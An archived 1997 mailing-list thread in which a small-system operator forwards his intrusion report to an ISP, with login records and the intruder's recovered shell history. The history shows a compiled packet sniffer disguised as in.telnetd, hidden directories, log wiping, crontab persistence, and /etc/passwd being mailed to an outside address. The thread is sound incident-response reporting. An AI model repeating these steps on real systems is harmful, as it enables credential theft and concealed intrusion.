1997-05-24 - Re: System Attack & FBI (fwd)

Header Data

From: ichudov@algebra.com (Igor Chudov @ home)
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Message Hash: 48d6a6f8f2c801eeb376b092accfbdedcafdda27e48989139645f91bd8f9952f
Message ID: <199705240556.AAA11857@manifold.algebra.com>
Reply To: <199705240433.XAA22417@einstein.ssz.com>
UTC Datetime: 1997-05-24 06:05:33 UTC
Raw Date: Sat, 24 May 1997 14:05:33 +0800

Raw message

From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 24 May 1997 14:05:33 +0800
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Subject: Re: System Attack & FBI (fwd)
In-Reply-To: <199705240433.XAA22417@einstein.ssz.com>
Message-ID: <199705240556.AAA11857@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Jim,

I was almost in tears as I was reading your logs.

Instead of simply asking your users to change passwords (always a great 
idea!) please let them know that multiuser Unix systems never offer any
real security or privacy to the users.

I hope that the hacker did not leave any other trojans besides rogue Apache
and in.telnetd.

igor

Jim Choate wrote:
> 
> Hi,
> 
> For your amusement.
> 
>                                        Jim Choate
>                                        CyberTects
>                                        ravage@ssz.com
> 
> 
> Forwarded message:
> > From ravage@ssz.com Fri May 23 23:28:29 1997
> > From: Jim Choate <ravage@ssz.com>
> > Message-Id: <199705240428.XAA22380@einstein.ssz.com>
> > Subject: System Attack & FBI
> > To: users@einstein.ssz.com
> > Date: Fri, 23 May 1997 23:28:27 -0500 (CDT)
> > Cc: staff@einstein.ssz.com
> > X-Mailer: ELM [version 2.4 PL23]
> > Content-Type: text
> > Content-Length: 7477      
> > 
> > 
> > Hi,
> > 
> > As you will see below I have been tracking a waskelly wabbit for the last
> > few weeks. I apologize for any interference with your access but I could
> > not let it go without some sort of responce.
> > 
> > I *STRONGLY* advise you to change your password immediately.
> > 
> > I do not expect anyone other than myself to have to talk with the FBI.
> > 
> > If you have any questions please feel free to email me.
> > 
> >                                                  Jim Choate
> >                                                  CyberTects
> >                                                  ravage@ssz.com
> > 
> > 
> > Forwarded message:
> > 
> > > From rberger@rberger.com Fri May 23 23:13:34 1997
> > > Message-Id: <3.0.1.32.19970523234327.006eefec@rberger.com>
> > > X-Sender: rberger@rberger.com
> > > X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
> > > Date: Fri, 23 May 1997 23:43:27 -0500
> > > To: Jim Choate <ravage@einstein.ssz.com>
> > > From: rberger <rberger@rberger.com>
> > > Subject: Re: You have a hacker!
> > > In-Reply-To: <199705240343.WAA22299@einstein.ssz.com>
> > > Mime-Version: 1.0
> > > Content-Type: text/plain; charset="us-ascii"
> > > 
> > > Thank you very much for sending us an e-mail and your logs.   We are going
> > > through
> > > our FTP logs at this time.   Although initial results don't show
> > > corresponding ftps at these
> > > times or files.     Although a week ago we were fighting a hacker using the
> > > a same
> > > techquies as shown by the telnet sessions.   So we will be monitoring
> > > everything very
> > > closely here for a few more days.  Our next search will be the accounts
> > > logged in on
> > > these ports at the times given.   We have been working with the FBI, along
> > > with several
> > > other ISP's in Dallas.   If you capture any other logs please send them
> > > again to
> > > root@applink.net.   If you dont hear anything from us in less than 24 hours
> > > please re-send
> > > your e-mail message again to my domain rberger@rberger.com just in case the
> > > root e-mail/logs are being monitored & modified.
> > > 
> > > Regards,
> > > 
> > > Randall Berger,  CEO
> > > AppLink Corporation
> > >  
> > > 
> > > At 10:43 PM 5/23/97 -0500, you wrote:
> > > >
> > > >Hello,
> > > >
> > > > 
> > > > My name is Jim Choate, I own and operate CyberTects a small office - home
> > > > office consultancy in Austin, TX. Over the last couple of weeks I have been
> > > > tracking an intrusion on my system that has involved your systems. I would
> > > > appreciate any help you can provide in resolving this issue.
> > > > 
> > > > I believe a home account for the perp is dkny007@hotmail.com
> > > > 
> > > > I will attach below the relevant files.
> > > > 
> > > > 
> > > >                                                     Jim Choate
> > > >                                                     CyberTects
> > > >                                                     ravage@ssz.com
> > > > 
> > > >  --------------------------------------------------------------------------
> > > > 
> > > > bbixler   ttyp0        app42-73.applink Fri May 23 16:04 - 16:06  (00:01)
> > > > bbixler   ttyp0        app42-75.applink Fri May 23 00:21 - 00:28  (00:07)
> > > > bbixler   ttyp0        app42-90.applink Thu May 22 13:33 - 13:37  (00:03)
> > > > bbixler   ttyp0        app41-50.applink Wed May 21 20:01 - 20:31  (00:30)
> > > > bbixler   ttyp0        app41-47.applink Wed May 21 19:53 - 19:54  (00:00)
> > > > bbixler   ttyp0        app42-85.applink Wed May 21 18:46 - 19:00  (00:14)
> > > > bbixler   ttyp0        app42-75.applink Wed May 21 10:39 - 10:40  (00:00)
> > > > bbixler   ttyp0        app41-52.applink Sun May 18 23:04 - 23:11  (00:07)
> > > > bbixler   ttyp1        app42-78.applink Sat May 17 18:46 - 18:49  (00:02)
> > > > bbixler   ttyp1        app42-67.applink Sat May 17 01:22 - 01:26  (00:03)
> > > > bbixler   ftp          fw6-10.ppp.iadfw Wed May 14 22:27 - 22:28  (00:01)
> > > > bbixler   ttyp1        app42-94.applink Tue May 13 16:12 - 16:18  (00:05)
> > > > bbixler   ttyp0        app42-85.applink Mon May 12 17:02 - 17:05  (00:02)
> > > > bbixler   ttyp0        app42-73.applink Sun May 11 12:29 - 12:36  (00:07)
> > > > bbixler   ttyp0        app42-71.applink Sat May 10 20:15 - 20:17  (00:01)
> > > > bbixler   ttyp0        app42-71.applink Sat May 10 19:40 - 19:50  (00:09)
> > > > bbixler   ttyp0        max2-800-04.eart Wed Feb 12 18:05 - 18:06  (00:00)
> > > > 
> > > > wtmp begins Sun Feb  2 16:36 
> > > > 
> > > >  --------------------------------------------------------------------------
> > > > 
> > > > whoami
> > > > ls
> > > > mv perl-ex.sh /tmp/.bgg
> > > > mkdir /tmp/.bg
> > > > cd /tmp
> > > > cd .bg
> > > > ls
> > > > lynx
> > > > ls
> > > > gcc linsniffer.c 
> > > > ls
> > > > ps
> > > > who
> > > > w
> > > > ps aux
> > > > a.out &
> > > > ls
> > > > ifconfig
> > > > /sbin/ifconfig
> > > > ls
> > > > tail -f tcp.log 
> > > > free
> > > > ls
> > > > cat tcp.log 
> > > > cd ..
> > > > ls
> > > > w
> > > > cd
> > > > cd ..
> > > > ls
> > > > cd ..
> > > > cd /etc
> > > > ls
> > > > minicom
> > > > cd ..
> > > > ls
> > > > cd cdrom.
> > > > cd cdrom
> > > > ls
> > > > cd ..
> > > > cd
> > > > ls
> > > > cd bin
> > > > ls
> > > > cd ..
> > > > cd ..
> > > > ls
> > > > w
> > > > finger
> > > > cd Pphantom
> > > > cat /etc/passwd | grep Pphantom
> > > > cd phantom
> > > > ls
> > > > ls -al
> > > > cat .bash_history 
> > > > cd /etc
> > > > cat hosts
> > > > ls
> > > > cd /tmp
> > > > cd .bg
> > > > cat tcp.log 
> > > > exit
> > > > cd .bg
> > > > ls
> > > > w
> > > > ls
> > > > ls -al
> > > > cat tcp.log 
> > > > ifconfig
> > > > /sbin/ifconfig
> > > > ls
> > > > exit
> > > > mv x.sh /tmp
> > > > cd .bg
> > > > ls
> > > > cd /tmp
> > > > ls
> > > > mv x.sh .bg
> > > > cd .bg
> > > > ls
> > > > kill -9 14523
> > > > ps aux
> > > > mv a.out in.telnetd
> > > > ls
> > > > rm tcp.log 
> > > > ./in.telnetd &
> > > > exit
> > > > pico tcp.log 
> > > > ls
> > > > ps aux
> > > > kill -9 16282
> > > > ls
> > > > ./in.telnetd &
> > > > exit
> > > > cat /dev/null > tcp.log
> > > > w
> > > > exit
> > > > pico tcp.log 
> > > > ls
> > > > ls -al
> > > > cd /etc
> > > > cat passwd
> > > > mail dkny007@hotmail.com < passwd
> > > > exit
> > > > w
> > > > ls -al
> > > > pico tcp.log 
> > > > echo /dev/null > tcp.log 
> > > > ls -al
> > > > ps aux
> > > > quit
> > > > exit
> > > > id
> > > > w
> > > > ftp 
> > > > ls
> > > > mkdir /home/ftp/.tmp
> > > > mkdir /home/ftp/.tmp/.sub
> > > > mv linsniff /home/ftp/.tmp/.sub/
> > > > cd /home/ftp/.tmp/.sub/
> > > > mv linsniff in.te1netd
> > > > ls -l
> > > > chmod 755 in.te1netd 
> > > > in.te1netd &
> > > > ps
> > > > ps aux
> > > > killall in.te1netd
> > > > ls
> > > > ls -a
> > > > ls -l
> > > > in.te1netd &
> > > > /home/ftp/.tmp/.sub/in.te1netd
> > > > /home/ftp/.tmp/.sub/in.te1netd
> > > > ls -s
> > > > rm in.te1netd 
> > > > cd
> > > > ls
> > > > mv hello .h311o
> > > > ftp 
> > > > ls
> > > > mv linsniffer.c /home/ftp/.tmp/.sub/
> > > > cd /home/ftp/.tmp/.sub
> > > > ls
> > > > cc linsniffer.c 
> > > > mv a.out in.te1netd
> > > > chmod 755 in.te1netd 
> > > > ls
> > > > rm linsniffer.c 
> > > > in.te1netd &
> > > > exit
> > > > cd ..
> > > > mv apache.tgz .bg
> > > > cd .bg
> > > > ls
> > > > tar xfvz apache.tgz 
> > > > cd apache_1.2b10/
> > > > ls
> > > > cd src
> > > > make
> > > > ls
> > > > ./Configure 
> > > > make
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd cgi-bin/
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd ..
> > > > ls
> > > > w
> > > > rm -rf apache*
> > > > lynx
> > > > ls
> > > > tar xfvz apache_1.1.3.tar.gz 
> > > > cd apache_1.1.3
> > > > ls
> > > > cd src
> > > > ls
> > > > ./Configure 
> > > > make
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd ..
> > > > ls
> > > > rm -rf apache_1.1.3
> > > > ls
> > > > rm -rf apache_1.1.3.tar.gz 
> > > > w
> > > > exit
> > > > kill -9 14551
> > > > ls
> > > > ls -al
> > > > cd ..
> > > > ls
> > > > cd /home
> > > > ls
> > > > cd ftp
> > > > ls -al
> > > > cd .tm[p
> > > > cd .tmp/
> > > > ls
> > > > ls -al
> > > > cd .sub/
> > > > ls
> > > > rm *
> > > > cd ..
> > > > cd ..
> > > > rm -rf .tmp/
> > > > ls
> > > > cd
> > > > ls
> > > > cd /root
> > > > ls
> > > > cd ssz
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd pgp
> > > > ls
> > > > cd ..
> > > > cd etc
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd /
> > > > ls
> > > > exit
> > > > id
> > > > crontab -e
> > > > ls
> > > > vi .sub
> > > > crontab -e
> > > > ls
> > > > cat /home/ftp/.tmp/.sub/tcp.log
> > > > ps aux
> > > > who
> > > > cd /home/ftp
> > > > ls -a
> > > > mkdir .tmp/.sub
> > > > mkdir .tmp
> > > > cd .tmp
> > > > exit
> > > > cd
> > > > ls
> > > > cd /root
> > > > ls
> > > > cd khg-0.5/
> > > > ls
> > > > cd ..
> > > > cat .bash_history 
> > > > ls
> > > > cd /etc
> > > > ls
> > > > cat hosts
> > > > exit
> > > > 
> > > >
> > > >
> > > >
> > > 
> > 
> 



	- Igor.






Thread